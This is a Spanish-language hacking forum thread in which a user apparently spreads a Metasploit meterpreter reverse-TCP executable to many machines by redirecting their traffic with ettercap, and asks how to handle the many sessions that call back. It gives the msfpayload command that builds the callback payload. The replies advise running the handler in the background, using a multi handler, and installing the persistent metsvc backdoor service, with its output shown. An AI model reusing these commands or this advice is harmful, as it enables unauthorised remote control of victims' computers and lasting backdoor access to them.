comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Duda en session meterpreter y handler

  • 3 Respuestas
  • 1431 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado tupac123

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Noviembre 06, 2013, 07:36:49 pm »
Hola , tengo una duda, seré directo con metasploit genere un payload que se llama bicho.exe  y con ettercap hago que todo se redirecionen y pues tenga el control ,y funciona lo malo es  que como son muchas maquinas al momento de dejar el handler en escucha solo hace 1 session y se quede en meterpreter y como todo sucede al mismo tiempo se pierden las otras conexiones que están en camino.

este es el código para generar el payload:

sudo msfpayload windows/meterpreter/reverse_tcp lhost=192.0.4.54  lport=4444 X > /home/Desktop/bicho.exe



se que en el código  esta el truco, quisiera que me ayuden en como puedo hacer que cuando la computadora vulnerada haga click en bicho.exe se redirecione a 192.0.4.54 y si esta, esta con una session meterpreter (osea ocupada ) esta vuelva a redirecionarse en unos 15 segundos.

esa es mi duda y gracias por leerlo espero me respondan  Underc0de ! salud2
« Última modificación: Agosto 20, 2014, 08:56:55 pm por Expermicid »

Desconectado DarkSpark

  • *
  • Underc0der
  • Mensajes: 67
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • el blog de darkspark
« Respuesta #1 en: Noviembre 06, 2013, 09:22:40 pm »
en el handler ponle la opcion -j ,despues de configurarlo
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
exploit -j

No tienes permisos para ver links. Registrate o Entra con tu cuenta
iberry9@hotmail.com

Desconectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 868
  • Actividad:
    0%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #2 en: Noviembre 07, 2013, 07:26:32 pm »
Puedes usar "metsvc". Permite definir un proceso persistente en la maquina objetivo que se encontrará a la espera de una nueva conexión por parte del atacante, para esto será necesario en primer lugar “migrar” el proceso de la sesión meterpreter actual a otro proceso “persistente” del objetivo, del modo en el que se ha indicando anteriormente con el comando migrate, por este motivo los procesos que resultan mas interesantes son aquellos propios del sistema operativo, posteriormente se puede ejecutar:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe…

[*] >> Uploading metsrv.dll…

[*] >> Uploading metsvc-server.exe…

[*] >> Uploading metsvc.exe…

[*] Starting the service…

* Installing service metsvc

* Starting service

Service metsvc successfully installed.

Como se puede apreciar la backdoor se ha instalado correctamente en el objetivo, ahora es posible realizar una conexión activa (ya no es necesario esperar de forma pasiva a que un usuario ejecute el fichero .exe que habilitará la sesión meterpreter).

Fuente: No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Noviembre 08, 2013, 01:54:38 am por CloudswX »
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Noviembre 17, 2013, 12:46:30 pm »
Haz uso de un multi handler para que tus sesiones se conecten  y ya ! .

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 6196
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2123
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1529
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 2662
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 2882
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made